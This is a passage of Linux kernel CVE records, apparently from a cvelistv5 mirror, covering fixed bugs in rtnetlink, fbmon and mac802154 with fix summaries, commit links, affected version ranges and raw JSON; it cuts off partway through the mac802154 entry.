          "url": "https://git.kernel.org/stable/c/b18fa894d615c8527e15d96b76c7448800e13899"
        },
        {
          "url": "https://git.kernel.org/stable/c/27d40bf72dd9a6600b76ad05859176ea9a1b4897"
        },
        {
          "url": "https://git.kernel.org/stable/c/4cb0d7532126d23145329826c38054b4e9a05e7c"
        },
        {
          "url": "https://git.kernel.org/stable/c/7d29d4c72c1e196cce6969c98072a272d1a703b3"
        },
        {
          "url": "https://git.kernel.org/stable/c/69276a555c740acfbff13fb5769ee9c92e1c828e"
        },
        {
          "url": "https://git.kernel.org/stable/c/4c089cefe30924fbe20dd1ee92774ea1f5eca834"
        },
        {
          "url": "https://git.kernel.org/stable/c/0e09cf81959d9f12b75ad5c6dd53d237432ed034"
        },
        {
          "url": "https://git.kernel.org/stable/c/18c198c96a815c962adc2b9b77909eec0be7df4d"
        }
      ],
      "title": "vfio/pci: Create persistent INTx handler",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26812",
    "datePublished": "2024-04-05T08:24:42.627Z",
    "dateReserved": "2024-02-19T14:20:24.180Z",
    "dateUpdated": "2025-05-04T08:57:07.696Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27414 (GCVE-0-2024-27414)

Vulnerability from cvelistv5 – Published: 2024-05-17 11:50 – Updated: 2025-05-04 12:55

Title

rtnetlink: fix error logic of IFLA_BRIDGE_FLAGS writing back

Summary

In the Linux kernel, the following vulnerability has been resolved: rtnetlink: fix error logic of IFLA_BRIDGE_FLAGS writing back In the commit d73ef2d69c0d ("rtnetlink: let rtnl_bridge_setlink checks IFLA_BRIDGE_MODE length"), an adjustment was made to the old loop logic in the function `rtnl_bridge_setlink` to enable the loop to also check the length of the IFLA_BRIDGE_MODE attribute. However, this adjustment removed the `break` statement and led to an error logic of the flags writing back at the end of this function. if (have_flags) memcpy(nla_data(attr), &flags, sizeof(flags)); // attr should point to IFLA_BRIDGE_FLAGS NLA !!! Before the mentioned commit, the `attr` is granted to be IFLA_BRIDGE_FLAGS. However, this is not necessarily true fow now as the updated loop will let the attr point to the last NLA, even an invalid NLA which could cause overflow writes. This patch introduces a new variable `br_flag` to save the NLA pointer that points to IFLA_BRIDGE_FLAGS and uses it to resolve the mentioned error logic.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b9fbc44159dfc3e9a…
	https://git.kernel.org/stable/c/882a51a10ecf24ce1…
	https://git.kernel.org/stable/c/a1227b27fcccc99dc…
	https://git.kernel.org/stable/c/f2261eb994aa5757c…
	https://git.kernel.org/stable/c/167d8642daa6a44b5…
	https://git.kernel.org/stable/c/831bc2728fb48a895…
	https://git.kernel.org/stable/c/743ad091fb46e622f…

Impacted products

Vendor

Product

Version

Linux

Affected: ad46d4861ed36315d3d9e838723ba3e367ecc042 , < b9fbc44159dfc3e9a7073032752d9e03f5194a6f (git)
Affected: abb0172fa8dc4a4ec51aa992b7269ed65959f310 , < 882a51a10ecf24ce135d573afa0872aef02c5125 (git)
Affected: 047508edd602921ee8bb0f2aa2100aa2e9bedc75 , < a1227b27fcccc99dc44f912b479e01a17e2d7d31 (git)
Affected: 8dfac8071d58447e5cace4c4c6fe493ce2f615f6 , < f2261eb994aa5757c1da046b78e3229a3ece0ad9 (git)
Affected: d73ef2d69c0dba5f5a1cb9600045c873bab1fb7f , < 167d8642daa6a44b51de17f8ff0f584e1e762db7 (git)
Affected: d73ef2d69c0dba5f5a1cb9600045c873bab1fb7f , < 831bc2728fb48a8957a824cba8c264b30dca1425 (git)
Affected: d73ef2d69c0dba5f5a1cb9600045c873bab1fb7f , < 743ad091fb46e622f1b690385bb15e3cd3daf874 (git)
Affected: 00757f58e37b2d9a6f99e15be484712390cd2bab (git)

Linux

Affected: 6.5
Unaffected: 0 , < 6.5 (semver)
Unaffected: 5.4.271 , ≤ 5.4.* (semver)
Unaffected: 5.10.212 , ≤ 5.10.* (semver)
Unaffected: 5.15.151 , ≤ 5.15.* (semver)
Unaffected: 6.1.81 , ≤ 6.1.* (semver)
Unaffected: 6.6.21 , ≤ 6.6.* (semver)
Unaffected: 6.7.9 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27414",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-21T15:56:59.979228Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:46:58.154Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:34:52.359Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b9fbc44159dfc3e9a7073032752d9e03f5194a6f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/882a51a10ecf24ce135d573afa0872aef02c5125"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a1227b27fcccc99dc44f912b479e01a17e2d7d31"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f2261eb994aa5757c1da046b78e3229a3ece0ad9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/167d8642daa6a44b51de17f8ff0f584e1e762db7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/831bc2728fb48a8957a824cba8c264b30dca1425"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/743ad091fb46e622f1b690385bb15e3cd3daf874"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/core/rtnetlink.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b9fbc44159dfc3e9a7073032752d9e03f5194a6f",
              "status": "affected",
              "version": "ad46d4861ed36315d3d9e838723ba3e367ecc042",
              "versionType": "git"
            },
            {
              "lessThan": "882a51a10ecf24ce135d573afa0872aef02c5125",
              "status": "affected",
              "version": "abb0172fa8dc4a4ec51aa992b7269ed65959f310",
              "versionType": "git"
            },
            {
              "lessThan": "a1227b27fcccc99dc44f912b479e01a17e2d7d31",
              "status": "affected",
              "version": "047508edd602921ee8bb0f2aa2100aa2e9bedc75",
              "versionType": "git"
            },
            {
              "lessThan": "f2261eb994aa5757c1da046b78e3229a3ece0ad9",
              "status": "affected",
              "version": "8dfac8071d58447e5cace4c4c6fe493ce2f615f6",
              "versionType": "git"
            },
            {
              "lessThan": "167d8642daa6a44b51de17f8ff0f584e1e762db7",
              "status": "affected",
              "version": "d73ef2d69c0dba5f5a1cb9600045c873bab1fb7f",
              "versionType": "git"
            },
            {
              "lessThan": "831bc2728fb48a8957a824cba8c264b30dca1425",
              "status": "affected",
              "version": "d73ef2d69c0dba5f5a1cb9600045c873bab1fb7f",
              "versionType": "git"
            },
            {
              "lessThan": "743ad091fb46e622f1b690385bb15e3cd3daf874",
              "status": "affected",
              "version": "d73ef2d69c0dba5f5a1cb9600045c873bab1fb7f",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "00757f58e37b2d9a6f99e15be484712390cd2bab",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/core/rtnetlink.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.5"
            },
            {
              "lessThan": "6.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.271",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.212",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.151",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.81",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.21",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.271",
                  "versionStartIncluding": "5.4.253",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.212",
                  "versionStartIncluding": "5.10.190",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.151",
                  "versionStartIncluding": "5.15.126",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.81",
                  "versionStartIncluding": "6.1.45",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.21",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.9",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.4.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nrtnetlink: fix error logic of IFLA_BRIDGE_FLAGS writing back\n\nIn the commit d73ef2d69c0d (\"rtnetlink: let rtnl_bridge_setlink checks\nIFLA_BRIDGE_MODE length\"), an adjustment was made to the old loop logic\nin the function `rtnl_bridge_setlink` to enable the loop to also check\nthe length of the IFLA_BRIDGE_MODE attribute. However, this adjustment\nremoved the `break` statement and led to an error logic of the flags\nwriting back at the end of this function.\n\nif (have_flags)\n    memcpy(nla_data(attr), \u0026flags, sizeof(flags));\n    // attr should point to IFLA_BRIDGE_FLAGS NLA !!!\n\nBefore the mentioned commit, the `attr` is granted to be IFLA_BRIDGE_FLAGS.\nHowever, this is not necessarily true fow now as the updated loop will let\nthe attr point to the last NLA, even an invalid NLA which could cause\noverflow writes.\n\nThis patch introduces a new variable `br_flag` to save the NLA pointer\nthat points to IFLA_BRIDGE_FLAGS and uses it to resolve the mentioned\nerror logic."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:42.575Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b9fbc44159dfc3e9a7073032752d9e03f5194a6f"
        },
        {
          "url": "https://git.kernel.org/stable/c/882a51a10ecf24ce135d573afa0872aef02c5125"
        },
        {
          "url": "https://git.kernel.org/stable/c/a1227b27fcccc99dc44f912b479e01a17e2d7d31"
        },
        {
          "url": "https://git.kernel.org/stable/c/f2261eb994aa5757c1da046b78e3229a3ece0ad9"
        },
        {
          "url": "https://git.kernel.org/stable/c/167d8642daa6a44b51de17f8ff0f584e1e762db7"
        },
        {
          "url": "https://git.kernel.org/stable/c/831bc2728fb48a8957a824cba8c264b30dca1425"
        },
        {
          "url": "https://git.kernel.org/stable/c/743ad091fb46e622f1b690385bb15e3cd3daf874"
        }
      ],
      "title": "rtnetlink: fix error logic of IFLA_BRIDGE_FLAGS writing back",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27414",
    "datePublished": "2024-05-17T11:50:57.207Z",
    "dateReserved": "2024-02-25T13:47:42.682Z",
    "dateUpdated": "2025-05-04T12:55:42.575Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35922 (GCVE-0-2024-35922)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2026-01-05 10:35

Title

fbmon: prevent division by zero in fb_videomode_from_videomode()

Summary

In the Linux kernel, the following vulnerability has been resolved: fbmon: prevent division by zero in fb_videomode_from_videomode() The expression htotal * vtotal can have a zero value on overflow. It is necessary to prevent division by zero like in fb_var_to_videomode(). Found by Linux Verification Center (linuxtesting.org) with Svace.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/1fb52bc1de55e9e0b…
	https://git.kernel.org/stable/c/72d091b7515e0532e…
	https://git.kernel.org/stable/c/951838fee462aa01f…
	https://git.kernel.org/stable/c/48d6bcfc31751ca2e…
	https://git.kernel.org/stable/c/664206ff8b019bcd1…
	https://git.kernel.org/stable/c/3d4b909704bf2114f…
	https://git.kernel.org/stable/c/1b107d637fed68a78…
	https://git.kernel.org/stable/c/c2d953276b8b27459…

Impacted products

Vendor

Product

Version

Linux

Affected: 2db54c72395298a58f29c75ae880be9e478fdbbd , < 1fb52bc1de55e9e0bdf71fe078efd4da0889710f (git)
Affected: 2db54c72395298a58f29c75ae880be9e478fdbbd , < 72d091b7515e0532ee015e144c906f3bcfdd6270 (git)
Affected: 2db54c72395298a58f29c75ae880be9e478fdbbd , < 951838fee462aa01fa2a6a91d56f9a495082e7f0 (git)
Affected: 2db54c72395298a58f29c75ae880be9e478fdbbd , < 48d6bcfc31751ca2e753d901a2d82f27edf8a029 (git)
Affected: 2db54c72395298a58f29c75ae880be9e478fdbbd , < 664206ff8b019bcd1e55b10b2eea3add8761b971 (git)
Affected: 2db54c72395298a58f29c75ae880be9e478fdbbd , < 3d4b909704bf2114f64f87363fa22b5ef8ac4a33 (git)
Affected: 2db54c72395298a58f29c75ae880be9e478fdbbd , < 1b107d637fed68a787da77a3514ad06e57abd0b4 (git)
Affected: 2db54c72395298a58f29c75ae880be9e478fdbbd , < c2d953276b8b27459baed1277a4fdd5dd9bd4126 (git)

Linux

Affected: 3.9
Unaffected: 0 , < 3.9 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35922",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-23T19:23:14.469241Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:25.984Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.909Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1fb52bc1de55e9e0bdf71fe078efd4da0889710f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/72d091b7515e0532ee015e144c906f3bcfdd6270"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/951838fee462aa01fa2a6a91d56f9a495082e7f0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/48d6bcfc31751ca2e753d901a2d82f27edf8a029"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/664206ff8b019bcd1e55b10b2eea3add8761b971"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3d4b909704bf2114f64f87363fa22b5ef8ac4a33"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1b107d637fed68a787da77a3514ad06e57abd0b4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c2d953276b8b27459baed1277a4fdd5dd9bd4126"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/video/fbdev/core/fbmon.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "1fb52bc1de55e9e0bdf71fe078efd4da0889710f",
              "status": "affected",
              "version": "2db54c72395298a58f29c75ae880be9e478fdbbd",
              "versionType": "git"
            },
            {
              "lessThan": "72d091b7515e0532ee015e144c906f3bcfdd6270",
              "status": "affected",
              "version": "2db54c72395298a58f29c75ae880be9e478fdbbd",
              "versionType": "git"
            },
            {
              "lessThan": "951838fee462aa01fa2a6a91d56f9a495082e7f0",
              "status": "affected",
              "version": "2db54c72395298a58f29c75ae880be9e478fdbbd",
              "versionType": "git"
            },
            {
              "lessThan": "48d6bcfc31751ca2e753d901a2d82f27edf8a029",
              "status": "affected",
              "version": "2db54c72395298a58f29c75ae880be9e478fdbbd",
              "versionType": "git"
            },
            {
              "lessThan": "664206ff8b019bcd1e55b10b2eea3add8761b971",
              "status": "affected",
              "version": "2db54c72395298a58f29c75ae880be9e478fdbbd",
              "versionType": "git"
            },
            {
              "lessThan": "3d4b909704bf2114f64f87363fa22b5ef8ac4a33",
              "status": "affected",
              "version": "2db54c72395298a58f29c75ae880be9e478fdbbd",
              "versionType": "git"
            },
            {
              "lessThan": "1b107d637fed68a787da77a3514ad06e57abd0b4",
              "status": "affected",
              "version": "2db54c72395298a58f29c75ae880be9e478fdbbd",
              "versionType": "git"
            },
            {
              "lessThan": "c2d953276b8b27459baed1277a4fdd5dd9bd4126",
              "status": "affected",
              "version": "2db54c72395298a58f29c75ae880be9e478fdbbd",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/video/fbdev/core/fbmon.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.9"
            },
            {
              "lessThan": "3.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbmon: prevent division by zero in fb_videomode_from_videomode()\n\nThe expression htotal * vtotal can have a zero value on\noverflow. It is necessary to prevent division by zero like in\nfb_var_to_videomode().\n\nFound by Linux Verification Center (linuxtesting.org) with Svace."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:35:43.183Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/1fb52bc1de55e9e0bdf71fe078efd4da0889710f"
        },
        {
          "url": "https://git.kernel.org/stable/c/72d091b7515e0532ee015e144c906f3bcfdd6270"
        },
        {
          "url": "https://git.kernel.org/stable/c/951838fee462aa01fa2a6a91d56f9a495082e7f0"
        },
        {
          "url": "https://git.kernel.org/stable/c/48d6bcfc31751ca2e753d901a2d82f27edf8a029"
        },
        {
          "url": "https://git.kernel.org/stable/c/664206ff8b019bcd1e55b10b2eea3add8761b971"
        },
        {
          "url": "https://git.kernel.org/stable/c/3d4b909704bf2114f64f87363fa22b5ef8ac4a33"
        },
        {
          "url": "https://git.kernel.org/stable/c/1b107d637fed68a787da77a3514ad06e57abd0b4"
        },
        {
          "url": "https://git.kernel.org/stable/c/c2d953276b8b27459baed1277a4fdd5dd9bd4126"
        }
      ],
      "title": "fbmon: prevent division by zero in fb_videomode_from_videomode()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35922",
    "datePublished": "2024-05-19T10:10:33.703Z",
    "dateReserved": "2024-05-17T13:50:33.124Z",
    "dateUpdated": "2026-01-05T10:35:43.183Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26961 (GCVE-0-2024-26961)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:19 – Updated: 2025-05-04 09:00

Title

mac802154: fix llsec key resources release in mac802154_llsec_key_del

Summary

In the Linux kernel, the following vulnerability has been resolved: mac802154: fix llsec key resources release in mac802154_llsec_key_del mac802154_llsec_key_del() can free resources of a key directly without following the RCU rules for waiting before the end of a grace period. This may lead to use-after-free in case llsec_lookup_key() is traversing the list of keys in parallel with a key deletion: refcount_t: addition on 0; use-after-free. WARNING: CPU: 4 PID: 16000 at lib/refcount.c:25 refcount_warn_saturate+0x162/0x2a0 Modules linked in: CPU: 4 PID: 16000 Comm: wpan-ping Not tainted 6.7.0 #19 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 RIP: 0010:refcount_warn_saturate+0x162/0x2a0 Call Trace: <TASK> llsec_lookup_key.isra.0+0x890/0x9e0 mac802154_llsec_encrypt+0x30c/0x9c0 ieee802154_subif_start_xmit+0x24/0x1e0 dev_hard_start_xmit+0x13e/0x690 sch_direct_xmit+0x2ae/0xbc0 __dev_queue_xmit+0x11dd/0x3c20 dgram_sendmsg+0x90b/0xd60 __sys_sendto+0x466/0x4c0 __x64_sys_sendto+0xe0/0x1c0 do_syscall_64+0x45/0xf0 entry_SYSCALL_64_after_hwframe+0x6e/0x76 Also, ieee802154_llsec_key_entry structures are not freed by mac802154_llsec_key_del(): unreferenced object 0xffff8880613b6980 (size 64): comm "iwpan", pid 2176, jiffies 4294761134 (age 60.475s) hex dump (first 32 bytes): 78 0d 8f 18 80 88 ff ff 22 01 00 00 00 00 ad de x......."....... 00 00 00 00 00 00 00 00 03 00 cd ab 00 00 00 00 ................ backtrace: [<ffffffff81dcfa62>] __kmem_cache_alloc_node+0x1e2/0x2d0 [<ffffffff81c43865>] kmalloc_trace+0x25/0xc0 [<ffffffff88968b09>] mac802154_llsec_key_add+0xac9/0xcf0 [<ffffffff8896e41a>] ieee802154_add_llsec_key+0x5a/0x80 [<ffffffff8892adc6>] nl802154_add_llsec_key+0x426/0x5b0 [<ffffffff86ff293e>] genl_family_rcv_msg_doit+0x1fe/0x2f0 [<ffffffff86ff46d1>] genl_rcv_msg+0x531/0x7d0 [<ffffffff86fee7a9>] netlink_rcv_skb+0x169/0x440 [<ffffffff86ff1d88>] genl_rcv+0x28/0x40 [<ffffffff86fec15c>] netlink_unicast+0x53c/0x820 [<ffffffff86fecd8b>] netlink_sendmsg+0x93b/0xe60 [<ffffffff86b91b35>] ____sys_sendmsg+0xac5/0xca0 [<ffffffff86b9c3dd>] ___sys_sendmsg+0x11d/0x1c0 [<ffffffff86b9c65a>] __sys_sendmsg+0xfa/0x1d0 [<ffffffff88eadbf5>] do_syscall_64+0x45/0xf0 [<ffffffff890000ea>] entry_SYSCALL_64_after_hwframe+0x6e/0x76 Handle the proper resource release in the RCU callback function mac802154_llsec_key_del_rcu(). Note that if llsec_lookup_key() finds a key, it gets a refcount via llsec_key_get() and locally copies key id from key_entry (which is a list element). So it's safe to call llsec_key_put() and free the list entry after the RCU grace period elapses. Found by Linux Verification Center (linuxtesting.org).

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/068ab2759bc0b4daf…
	https://git.kernel.org/stable/c/d3d858650933d44ac…
	https://git.kernel.org/stable/c/dcd51ab42b7a04315…
	https://git.kernel.org/stable/c/20d3e1c8a18474972…
	https://git.kernel.org/stable/c/640297c3e897bd7e1…
	https://git.kernel.org/stable/c/49c8951680d7b76fc…
	https://git.kernel.org/stable/c/e8a1e58345cf40b7b…

Impacted products

Vendor

Product

Version

Linux

Affected: 5d637d5aabd85132bd85779677d8acb708e0ed90 , < 068ab2759bc0b4daf0b964de61b2731449c86531 (git)
Affected: 5d637d5aabd85132bd85779677d8acb708e0ed90 , < d3d858650933d44ac12c1f31337e7110c2071821 (git)
Affected: 5d637d5aabd85132bd85779677d8acb708e0ed90 , < dcd51ab42b7a0431575689c5f74b8b6efd45fc2f (git)
Affected: 5d637d5aabd85132bd85779677d8acb708e0ed90 , < 20d3e1c8a1847497269f04d874b2a5818ec29e2d (git)
